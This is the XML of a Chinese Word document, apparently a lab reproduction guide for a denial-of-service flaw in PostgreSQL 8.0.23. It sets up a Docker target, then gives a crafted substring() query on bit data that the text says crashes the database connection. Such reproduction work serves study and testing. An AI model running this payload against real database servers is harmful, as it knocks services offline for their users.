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C0589" w14:textId="1A7D7DFE" w:rsidR="00DE0246" w:rsidRDefault="00881BAE" w:rsidP="00881BAE">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00881BAE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>靶机运行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546E9741" w14:textId="768C2A32" w:rsidR="00EA3792" w:rsidRPr="00EA3792" w:rsidRDefault="00EA3792" w:rsidP="00EA3792">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进入 Docker 环境文件夹</w:t>
      </w:r>
      <w:r w:rsidR="00AA1E99" w:rsidRPr="00AA1E99">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Postgres-8.0.23</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，打开命令行：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6817BD9A" w14:textId="48BCDF68" w:rsidR="00DA0DBA" w:rsidRDefault="00EA3792" w:rsidP="00DA0DBA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1、使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA3792">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker-compose build</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令构建环境；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15217A30" w14:textId="4272CA04" w:rsidR="00DA0DBA" w:rsidRDefault="00EA3792" w:rsidP="00DA0DBA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2、使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA3792">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker-compose up -d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动环境；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431719C6" w14:textId="17EDC261" w:rsidR="00EA3792" w:rsidRDefault="00EA3792" w:rsidP="00DA0DBA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3、使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA3792">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">docker-compose </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA3792">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看数据库环境是否正常运行及开放</w:t>
      </w:r>
      <w:r w:rsidR="00BB76DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2545FE" w14:textId="33A5A25C" w:rsidR="004413E2" w:rsidRPr="004413E2" w:rsidRDefault="004413E2" w:rsidP="00DA0DBA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004413E2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4、复现完成后使用命令docker-compose down关闭容器。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20832BBB" w14:textId="118A90AE" w:rsidR="00A92BD5" w:rsidRPr="00A92BD5" w:rsidRDefault="00A92BD5" w:rsidP="00DA0DBA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4E31647E" wp14:editId="3CB9243B">
            <wp:extent cx="5265420" cy="2704465"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="19351567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70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467DA" w14:textId="4D4F8145" w:rsidR="00DA0DBA" w:rsidRDefault="00DA0DBA" w:rsidP="00DA0DBA">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞利用步骤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3296AB4E" w14:textId="70655267" w:rsidR="001C67F9" w:rsidRDefault="001C67F9" w:rsidP="001C67F9">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C67F9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>入</w:t>
      </w:r>
      <w:r w:rsidRPr="001C67F9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>容器命令行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00746D24">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>docker exec -it postgres-8.0.23 /bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00746D24">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="73507354" w14:textId="645C32A5" w:rsidR="001C67F9" w:rsidRDefault="001C67F9" w:rsidP="001C67F9">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C67F9">
        <w:t>使用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001C67F9">
        <w:t>postgres</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001C67F9">
        <w:t>用户创建数据库</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001C67F9">
        <w:t>testdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00746D24">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>createdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00746D24">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -U </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00746D24">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>postgres</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00746D24">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00746D24">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>testdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3701B28E" w14:textId="18E73473" w:rsidR="001C67F9" w:rsidRDefault="001C67F9" w:rsidP="001C67F9">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C67F9">
        <w:t>使用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001C67F9">
        <w:t>psql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001C67F9">
        <w:t>工具连接</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001C67F9">
        <w:t>postgres</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001C67F9">
        <w:t>用户的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001C67F9">
        <w:t>testdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001C67F9">
        <w:t>数据库</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00746D24">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>psql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00746D24">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -d </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00746D24">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>testdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00746D24">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -U </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00746D24">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>postgres</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="72A9A748" w14:textId="5970F6CE" w:rsidR="001C67F9" w:rsidRDefault="001C67F9" w:rsidP="001C67F9">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C67F9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>构造一个特定的SQL查询，使用substring()函数对bit类型数据执行操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00746D24">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00746D24">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>substring(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00746D24">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>B'10101010101010101010101010101010101010101010101', 33, -15);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216853DB" w14:textId="2112D17C" w:rsidR="00746D24" w:rsidRPr="001C67F9" w:rsidRDefault="001C67F9" w:rsidP="00746D24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执行后可以看到数据库断开连接</w:t>
      </w:r>
      <w:r w:rsidR="00746D24">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，成功DoS，之后数据库自动尝试重新连接成功</w:t>
      </w:r>
      <w:r w:rsidR="00746D24">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56FA0EC3" wp14:editId="18634A22">
            <wp:extent cx="5260975" cy="1898015"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="6918166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975" cy="189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EAD18" w14:textId="57E3C14B" w:rsidR="00746D24" w:rsidRPr="001C67F9" w:rsidRDefault="00746D24" w:rsidP="00746D24">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00746D24" w:rsidRPr="001C67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70435"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BB62487A"/>
    <w:lvl w:ilvl="0" w:tplc="4F503F1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21986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0EC"/>
    <w:rsid w:val="000A5C0C"/>
    <w:rsid w:val="000D0CC9"/>
    <w:rsid w:val="00192DAB"/>
    <w:rsid w:val="001C67F9"/>
    <w:rsid w:val="001F470D"/>
    <w:rsid w:val="0022069F"/>
    <w:rsid w:val="002F0549"/>
    <w:rsid w:val="00353491"/>
    <w:rsid w:val="004413E2"/>
    <w:rsid w:val="004A00AD"/>
    <w:rsid w:val="00553595"/>
    <w:rsid w:val="00746D24"/>
    <w:rsid w:val="00881BAE"/>
    <w:rsid w:val="00A92BD5"/>
    <w:rsid w:val="00AA1E99"/>
    <w:rsid w:val="00BB76DC"/>
    <w:rsid w:val="00BC10EC"/>
    <w:rsid w:val="00C66350"/>
    <w:rsid w:val="00DA0DBA"/>
    <w:rsid w:val="00DA5642"/>
    <w:rsid w:val="00DE0246"/>
    <w:rsid w:val="00DF4450"/>
    <w:rsid w:val="00E86686"/>
    <w:rsid w:val="00EA3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C475B1"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{11E091C8-56E0-490E-9331-FEAD1E19C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0CC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C10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1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10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10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10E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10E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10E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10E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10E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10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C1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C1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C10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10E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C10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10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10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10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10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1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10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10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1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10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10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10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1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10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10EC"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="11">
    <w:name w:val="样式1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="12"/>
    <w:qFormat/>
    <w:rsid w:val="00881BAE"/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="12">
    <w:name w:val="样式1 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="11"/>
    <w:rsid w:val="00881BAE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259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9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158</Words>
  <Characters>351</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>10</Lines>
  <Paragraphs>12</Paragraphs>
  <ScaleCrop>false</ScaleCrop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蒋华 魏</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>魏蒋华</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-05-27T14:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-07-04T12:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>